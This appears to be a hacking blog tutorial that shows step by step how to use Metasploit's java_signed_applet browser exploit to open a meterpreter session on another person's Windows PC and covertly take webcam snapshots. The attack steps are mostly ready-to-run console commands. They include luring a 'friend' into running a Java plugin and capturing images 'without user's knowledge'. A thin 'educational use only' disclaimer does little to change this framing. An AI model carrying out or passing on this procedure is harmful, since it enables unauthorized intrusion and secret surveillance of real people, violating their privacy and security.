Hack Webcam on Network using Ubuntu by infompak
Hack Webcam on Network using Ubuntu by infompak

In this ethical hacking tutorial we are going to show you how to hack Webcam on a Laptop or a PC running Windows, on the network using Ubuntu Linux operating system. Here I am using 64 bit Ubuntu 13.04 distribution. We are going to use a tool called Metasploit to get access to Windows PC’s capture screen shot without user’s knowledge. Just follow the simple steps below.

Setup Instructions:

1.Open Terminal and type the following command to download Metasploit.
For 64-bit:
 $wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
For 32-bit:
$wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run
2.Open the directory where Metasploit is downloaded and enter the commands to Install metasploit in your Linux PC
$chmod +x metasploit-latest-linux-x64-installer.run
.$/metasploit-latest-linux-x64-installer.run
3.Then follow the on screen instructions to install Metasploit and choose a directory to install Metasploit. Here I installed Metasploit in /opt/metasploit

Hacking Instructions:

1.Open Terminal and navigate to Metasploit installation directory. For example /opt/metasploit.
2.Enter the command to start Metasploit.
sudo msfpro
Now Metasploit starts loading and you will see a screen similar to this.
hack webcam using ubuntu
3.Now enter the command one by one in msf> console and press enter
use multi/browser/java_signed_applet
set SRVPORT 1589
set URIPATH /
exploit
4.Now metasploit will be running on your local IP similar to 192.168.40.198:1589
5.Send the IP to your friend over network, and when your friend opens the IP in his browser it asks for a Java Plugin to run . When your friend run this Plugin meterpreter starts its session and it shows the message
“Meterpreter session 1 opened (192.168.40.198:4444 -> 192.168.40.212:55441) at 2013-09-12 11:02:00 +0530”
hack webcam using ubuntu
Browser where Java plugin shows
6.Now enter the command to start meterpreter session
sessions -i 1
Now meterpreter starts its session in remote PC.
7.Now enter the command to see the webcam list in meterpreter> console
webcam_list
8.Enter webcam_snap to take a snapshot of remote PC. It will be saved in metasploit root folder.
hack webcam using ubuntu
Photo Captured by Metasploit

Note:
This is for educational use only.
Enjoy :)
Any questions comment here.

Post a Comment

thanks for your feedback

 
Top